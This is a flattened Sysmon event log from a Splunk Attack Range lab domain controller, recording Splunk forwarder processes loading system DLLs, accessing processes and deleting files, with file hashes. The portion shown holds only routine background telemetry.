Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100162Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100161Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100160Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100159Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x8000000000000000100142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x8000000000000000100137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.045{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000100236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:50.810{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F384CECFFFD0109ADEEEA79469EA79C5,SHA256=8AD2C35B957B6BF440B225FD61C511B0BEC98E76D071154081DD72B7E706A0B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.065{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53349-false10.0.1.12-8000- 23542300x8000000000000000100234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:50.185{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D81F9BA5639D8103223609E924FB10C,SHA256=73F26A7B7039BFD059F8874D22B17A1D6568B913BF627A09A7C277584878CA18,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000100305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 